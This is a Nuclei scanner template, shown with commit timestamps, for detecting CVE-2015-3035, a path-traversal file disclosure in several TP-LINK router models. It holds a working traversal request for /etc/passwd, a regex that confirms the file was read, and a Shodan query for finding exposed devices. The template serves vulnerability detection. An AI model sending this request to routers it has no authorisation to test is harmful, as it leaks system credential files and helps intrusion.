nuclei-templates/http/cves/2015/CVE-2015-3035.yaml

44 lines
1.8 KiB
YAML
Raw Normal View History

2022-09-18 09:05:59 +00:00
id: CVE-2015-3035
2022-09-18 09:05:59 +00:00
info:
name: TP-LINK - Local File Inclusion
2022-09-18 09:05:59 +00:00
author: 0x_Akoko
severity: high
description: |
TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.
2022-09-18 09:05:59 +00:00
reference:
- https://seclists.org/fulldisclosure/2015/Apr/26
- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt
- http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware
- https://nvd.nist.gov/vuln/detail/CVE-2015-3035
2023-07-15 16:29:17 +00:00
- http://www.tp-link.com/en/download/Archer-C5_V1.20.html#Firmware
2022-09-18 09:05:59 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N
cvss-score: 7.8
2022-09-18 09:05:59 +00:00
cve-id: CVE-2015-3035
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.58993
cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.title:"TP-LINK"
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: tp-link
product: tl-wr841n_\(9.0\)_firmware
tags: router,lfi,seclists,cve,cve2015,tplink,kev
2022-09-18 09:05:59 +00:00
http:
2022-09-18 09:05:59 +00:00
- method: GET
path:
- "{{BaseURL}}/login/../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200